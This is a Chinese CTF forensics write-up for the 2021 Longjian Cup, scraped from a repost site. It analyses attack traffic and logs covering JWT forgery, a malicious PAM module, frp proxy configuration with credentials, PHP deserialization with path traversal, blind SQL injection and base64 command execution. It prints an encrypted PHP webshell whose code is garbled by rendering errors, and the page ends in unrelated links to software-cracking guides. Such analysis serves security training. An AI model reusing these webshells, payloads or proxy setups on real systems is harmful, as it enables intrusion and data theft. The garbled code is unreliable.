2021陇剑杯

在这里插入图片描述过滤http,发现大量http数据包
在这里插入图片描述只发现少量dns流量包和没有发现ftp流量包
在这里插入图片描述所以判断出是http协议攻击
2.1
在这里插入图片描述直接过滤HTTP包,右键选择“追踪流”进入tcp流
在这里插入图片描述
将token进行jwt解码,出现jwt字段,所以判断出是jwt认证

在这里插入图片描述
2.2
在这里插入图片描述过滤http,追踪tcp流,将token内容直接拿去base64解码
在这里插入图片描述得到
{“alg”:“HS256”,“typ”:“JWT”}.{“id”:10086,“MapClaims”:{“aud”:“admin”,“username”:"admin"fX0.t+·ãas3_
ZÞÚüåÅì4l¹ŽfÂÖrŸ8fc
拿去提交:10086#admin,但发现是错的
当追踪到第10个tcp流的时候,将token拿去base64解密,发现内容和前面不一样
在这里插入图片描述在这里插入图片描述
得到:10087#admin
2.3
在这里插入图片描述在第10个TCP流里发现root权限
在这里插入图片描述
2.4
在这里插入图片描述在第13个tcp流中发现上传了一大串内容
在这里插入图片描述
先进行url解码,在进行base64解码,发现是一个python脚本,这就是上传的恶意内容,将其全部输入到1.c当中。所以文件名为1.c
在这里插入图片描述2.5
在这里插入图片描述在第22个tcp流中发现looter.so结合题目编译的恶意so文件。所以就是looter.so
在这里插入图片描述2.6
在这里插入图片描述发现文件“looter.so”文件被导向/etc/pam.d/common-auth路径,这里就是被修改的配置文件。
/etc/pam.d/common-auth
在这里插入图片描述3.1
在这里插入图片描述
追踪tcp流,在第6个tcp包中发现密码。
在这里插入图片描述%40url解码为@,%23url解码为#
得到密码Admin123!@#
3.2
在这里插入图片描述追踪tcp流,在第24个tcp流中发现一个路径
在这里插入图片描述data/Runtime/Logs/Home/21_08_07.log
但当前路径是在网站根目录。所以完整路径是
/var/www/html/data/Runtime/Logs/Home/21_08_07.log

3.3
在这里插入图片描述追踪http流,在第35个http流中发现权限是www-data
在这里插入图片描述3.4
在这里插入图片描述追踪tcp流,在第33个tcp流发现将webshell写入了1.php中
在这里插入图片描述3.5
在这里插入图片描述搜索1.php这个webshell木马文件。查找几个后发现frpc.ini,所以代理客户端名字是frpc
在这里插入图片描述3.6
在这里插入图片描述在第38个tcp流中发现一串Hex进制的的value值
在这里插入图片描述进行hex解码字符串得到
[common]
server_addr = 192.168.239.123
server_port = 7778
token=Xa3BJf2l5enmN6Z7A8mv

[test_sock5]
type = tcp
remote_port =8111
plugin = socks5
plugin_user = 0HDFt16cLQJ
plugin_passwd = JTN276Gp
use_encryption = true
use_compression = true

所有ip为192.168.239.123
3.7
在这里插入图片描述根据3.6的hex解密出内容得到用户名和密码为0HDFt16cLQJ#JTN276Gp
4.1
在这里插入图片描述查找200,发现www.zip
在这里插入图片描述
4.2
在这里插入图片描述根据题意查找tmp,发现为Fsess_car,所有写入文件名为Fsess_car
在这里插入图片描述4.3
在这里插入图片描述搜索file,发现只有一两个地方有该关键字。
在这里插入图片描述将该地方进行url解密得到
在这里插入图片描述/?filename=…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/tmp/sess_car&content=func|N;files|a:2:{s:8:“filename”;s:16:"./files/filename";s:20:“call_user_func_array”;s:28:"./files/call_user_func_array";}paths|a:1:{s:5:"/flag";s:13:“SplFileObject”;} HTTP/1.1" 302 879 “-” “python-requests/2.26.0”
发现一个序列化内容,SplFileObject即为序列化内容中的类
7.1
在这里插入图片描述查看一下日志,发现user参数后面跟着一段base64加密内容
在这里插入图片描述进行base64解密,应该就是rce了,所以攻击参数是user
在这里插入图片描述7.2
在这里插入图片描述参看日志,发现另外一个user参数后面跟着一段base64编码内容
解行解密后发现密码文件的绝对路径是/Th4s_IS_VERY_Import_Fi1e
在这里插入图片描述7.3
在这里插入图片描述查看日志,发现最后一个user参数后面也是跟着一段base64编码,base64解密的时候他报错了,提示无效字符%
在这里插入图片描述
将%2b改成+号进行base64解密得到
在这里插入图片描述所以为192.168.2.197:8888
8.1
在这里插入图片描述查看日志,随便挑一个进行url解密,发现是布尔盲注
在这里插入图片描述8.2
在这里插入图片描述
数据库名sqli
在这里插入图片描述表名flag
在这里插入图片描述字段名flag
在这里插入图片描述8.3
在这里插入图片描述获取字段值,可以一个一个慢慢查看获取
python脚本获取
from urllib import parse

num = 0
line = 0
tmp1 = 1
tmp2 = 2
str1 = ‘’

with open(“access.log”, ‘r’) as f:
string = f.readline()
while (string != ‘’):

    if ("sqli.flag" in string):string = parse.unquote(string)num = string.find("sqli.flag")  # 字符num += 19line = string.find("sqli.flag")line += 11if (string[line + 1] == ","):tmp1 = int(string[line])elif (string[line + 1] != ","):num += 1tmp1 = int(string[line:line + 2])if (tmp1 == tmp2):  # 发现目标字符,是上一行的tmp2 += 1print(str1, end="")str1 = string[num]  # 保留上一行的字符string = f.readline()

运行脚本,得到flag
在这里插入图片描述9.1
在这里插入图片描述在服务器pcap的第27个包中发现上传了木马
在这里插入图片描述木马内容为
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode( D , D, D,K){
for( i = 0 ; i=0; i=0;i<strlen( D ) ; D); D);i++) {
$c = K [ K[ K[i+1&15];
D [ D[ D[i] = D [ D[ D[i]^$c;
}
return $D;
}
$pass=‘key’;
$payloadName=‘payload’;
k e y = ′ 3 c 6 e 0 b 8 a 9 c 15224 a ′ ; i f ( i s s e t ( key='3c6e0b8a9c15224a'; if (isset( key=3c6e0b8a9c15224a;if(isset(_POST[$pass])){
d a t a = e n c o d e ( b a s e 6 4 d e c o d e ( data=encode(base64_decode( data=encode(base64decode(_POST[ p a s s ] ) , pass]), pass]),key);
if (isset( S E S S I O N [ _SESSION[ SESSION[payloadName])){
p a y l o a d = e n c o d e ( payload=encode( payload=encode(_SESSION[ p a y l o a d N a m e ] , payloadName], payloadName],key);
eval( p a y l o a d ) ; e c h o s u b s t r ( m d 5 ( payload); echo substr(md5( payload);echosubstr(md5(pass. k e y ) , 0 , 16 ) ; e c h o b a s e 6 4 e n c o d e ( e n c o d e ( @ r u n ( key),0,16); echo base64_encode(encode(@run( key),0,16);echobase64encode(encode(@run(data), k e y ) ) ; e c h o s u b s t r ( m d 5 ( key)); echo substr(md5( key));echosubstr(md5(pass.KaTeX parse error: Expected 'EOF', got '}' at position 15: key),16); }̲else{ i…data,“getBasicsInfo”)!==false){
S E S S I O N [ _SESSION[ SESSION[payloadName]=encode( d a t a , data, data,key);
}
}
}
10.1
在这里插入图片描述追踪tcp流,在第15个tcp流位置发现转发,所以服务器ip是3.128.156.159
在这里插入图片描述10.2
在这里插入图片描述追踪tcp流,在第15个tcp流中发现github项目
在这里插入图片描述访问后发现是stowaway
在这里插入图片描述10.3
在这里插入图片描述同10.3数据流,转发操作有密钥hack4sec
在这里插入图片描述在这里插入图片描述10.5
在这里插入图片描述进行端口过滤,发现只有10-499范围有流量包。所以扫描范围是10-499
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://xiahunao.cn/news/253087.html

如若内容造成侵权/违法违规/事实不符,请联系瞎胡闹网进行投诉反馈,一经查实,立即删除!

相关文章

Roblox剑九之剑一

Roblox剑九之剑一【初生之剑】 初生导航 Roblox剑九之剑一【初生之剑】前言一、学习路线二、平台使用1、安装配置1.1 全局开启VPN1.2 官网注册账号1.3 编辑器下载与登入 2、功能介绍 三、开发分工1、总负责2、策划3、程序4、美术5、运营 前言 博主于2020年入坑UGC游戏开发&…

易语言 服务器 xml,易语言XML支持库入门教程源码

易语言XML支持库入门教程系统结构:易语言XML支持库入门教程源码,XML支持库入门教程 窗口程序集1 || ||------_按钮_创建XML_被单击 || ||------_按钮_释放XML树_被单击 || ||------_按钮_导入_被单击 || ||------_按钮_插入节点_被单击 || ||------_按钮_插入属性_被单击 || ||…

win10用易语言需要C环境,win10系统易语言打开支持库配置就崩溃的具体教程

有关win10系统易语言打开支持库配置就崩溃的操作方法想必大家有所耳闻。但是能够对win10系统易语言打开支持库配置就崩溃进行实际操作的人却不多。其实解决win10系统易语言打开支持库配置就崩溃的问题也不是难事&#xff0c;小编这里提示两点&#xff1a;1、右键“我的电脑(计算…

易语言 标准c 动态库,易语言Dll动态库的开发

一&#xff0e;关于易语言DLL 易语言Dll动态库的开发是编程当中和其他语言开发进行交互必不可少的方法之一,从易语言3.6版开始&#xff0c;已经能够支持对DLL动态链接库的开发&#xff0c; 编译出的DLL是标准的DLL&#xff0c;和其他编程语言生成的标准DLL的调用方法相同。易语…

易语言黑月c编译器,易语言黑月编译器

易语言黑月编译器是网友云外归鸟的作品&#xff0c;我只是在他的基础上做了小小的升级&#xff0c;并且得到他的允许再发布出来的。其实大家如果单独看易语言黑月视频教程的话&#xff0c;肯定是没用的&#xff0c;因为少了易语言黑月编译器&#xff0c;就无法正常学习&#xf…

linux易语言安装目录文件,易语言编译linux文件与相关支持库

引言&#xff1a; 玩了很多年易语言才发现易语言也可以编译linux下的文件,今天就试了试,在网上找了一下,还真的可以,于是收集与整理一下,学好易语言还是挺有用的,感觉。 首先现在易语言创建一个linux 程序。 以下是语言测试代码&#xff1a; 完成后&#xff0c;进行编译&#x…

java支持库 易语言_Java支持库|简易语言源网络|易语言资源网| e5a5x

Java支持库 支持库名称: Java支持库2.0版 相关文件: C: \ ProgramFiles(x86)\ e \ lib \ Javalib.fne 数字签名: F3DA9F65E55F47cb8A8DAC95A189F4B1 注意: 该支持库使Yi语言可以访问Java类库. “ Java虚拟机”和“ Java本机接口”是此支持库中的两个最重要的数据类型. “ Java虚…

用c语言写易语言Linux库,C语言编写支持库教程

已有11位网友发表了看法&#xff1a; 三叶资源网 评论于 [2019-01-09 00:14:06] 易语言支持库第一课 什么是易语言支持库&#xff1f; 易语言支持库的开发文档。 前期准备工作&#xff0c;环境&#xff0c;路径配置。 lib2.h 必须文件&#xff0c;包含支持库类型、宏定义等 fn…

java支持库 易语言_易语言支持库|易语言支持库更新集合包下载233个 - 欧普软件下载...

易语言支持库更新集合包是目前比较齐全的集合包&#xff0c;包含233个&#xff0c;有EXCEL2000支持库2.0、Java支持库2.0、PowerPoint2000支持库2.0、DirectX2D支持库2.0、位图操作支持库2.0等等&#xff0c;一包在手&#xff0c;所有功能都可实现了&#xff0c;有需要的朋友赶…

易语言支持库配置闪退丨支持库配置崩溃_易语言打开支持库配置就闪退怎么办?

易语言支持库配置闪退打不开怎么办&#xff1f; 易语言支持库配置闪退解决方法丨支持库配置崩溃_易语言打开支持 易语言支持库配置闪退丨支持库配置崩溃_易语言打开支持库配置就闪退怎么办? 很多人都遇到过 打开易语言支持库安装菜单报错退出的问题 今天教大家解决方法 我们…

idea配置javap命令

文章目录 idea配置javap命令1. 通过idea配置javap -c命令来配置下javap命令1.1 选择File->Settings->Tools->External Tools1.2 点击号1.3 按如下配置&#xff1a; 2 在idea上使用javap -c命令2.1 在当前类上执行javap -c命令2.2 执行结果&#xff1a; 3 javap命令的参…

ImageMagick将多张图片拼接成一张图片_只有一张图片,也能做出一整套PPT!

暑期特惠最后一天 超值福利限时领取 做 PPT 经常遇到这样的问题: 老板在玩命催促,眼看着就到 deadline 了,手头上的素材却少得可怜,怎么才能快速完成一套 PPT 啊! 不慌,今天我们就来挑战用一张图片,做出一整套 PPT! 作者:忘吃药的晓公子 来源:忘吃药的晓公子(ID:CRA…

ImageMagick将多张图片拼接成一张图片_介绍一款全功能的图片查看编辑软件

平常经常要打开图片和裁剪编辑图片&#xff0c;经常好几个工具串着用。 虽然使用没什么大碍&#xff0c;但切换应用繁琐了点。 刚好格式工厂家出了图片工厂这款软件。 官网说图片工厂基本上所有的图片处理需求都能满足。 我去官网&#xff08;http://www.pcfreetime.com&#x…

【Opencv】Python+openCV实现全景图拼接(左右两张图片拼接成一张全景图)

PythonopenCV实现全景图拼接&#xff08;左右两张图片拼接成一张全景图&#xff09; 全景图拼接思路具体步骤 代码与结果代码效果测试1效果测试2 全景图拼接 思路 这个就是简单对左右两张图进行拼接&#xff0c;希望实现下面效果&#xff1a; 左图 全景图 右图 这里不是指严丝…

IDEA下载、破解和测试(自己记录)

下载破解教程在微信 代码直接引用 psvm sout

2023最新IDEA安装以及使用教程

****************************************** 新增IDEA常用设置 csdn官方链接http://t.csdn.cn/QVKso​​​​​​ ****************************************** Tip&#xff1a;安装教程使用2022.3.3版本 ****************************************** 官方网站下载https…

IDEA破解方法

首先&#xff0c;下载JetbrainsCrack.jar包&#xff0c;放入到IDEA安装目录的bin目录下&#xff1b; 某盘链接&#xff1a;https://pan.baidu.com/s/16lA7ie6JlbMU_ztW49RASA 提取码&#xff1a;p1ef 其次&#xff0c;打开试用版idea&#xff0c;然后打开IDEA菜单&#xff1a;H…

如何卸载 IDEA 破解补丁 Betterintellij ?

如何卸载 IDEA 破解补丁 Betterintellij ? 开始卸载 Betterintellij 补丁 这个补丁被黑客篡改过&#xff0c;有安全风险&#xff0c;强烈建议小伙伴们卸载掉&#xff0c;以免对自己造成损失。怎么卸载呢&#xff1f;跟着下文操作即可。 开始卸载 Betterintellij 补丁 1、在 …

IDEA破解教程

一、将下载的 JetbrainsCrack-2.6.2.jar 破解补丁放在你的安装idea下面的bin的目录下面&#xff08;如图&#xff09;。 我的是F:\idea\IntelliJ IDEA 2017.1\bin 二、修改配置文件 在安装的idea下面的bin目录下面有2个文件 &#xff1a; 一个是idea64.exe.vmoptions&#xf…

2019IDEA破解安装

安装 直接去官网下载正版的IDEA&#xff1a; https://www.jetbrains.com/idea/download/ 下图 下载完成&#xff0c;直接点击安装包运行就可以了。 安装时&#xff0c;选择适合自己电脑的版本&#xff08;64位&#xff0c;或者32位&#xff09;已及安装路径即可&#xff0c;其…